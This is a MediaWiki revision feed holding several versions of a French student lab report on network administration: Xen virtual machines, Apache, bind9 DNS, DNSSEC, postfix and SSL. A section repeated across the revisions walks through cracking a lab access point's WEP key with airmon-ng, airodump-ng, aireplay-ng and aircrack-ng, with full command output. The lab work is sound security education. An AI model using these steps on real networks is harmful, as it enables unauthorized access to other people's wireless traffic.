15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35649</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35649"/>
				<updated>2016-12-06T10:06:53Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : /* Cassage clé */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35648</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35648"/>
				<updated>2016-12-06T10:05:22Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : /* Cassage clé */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
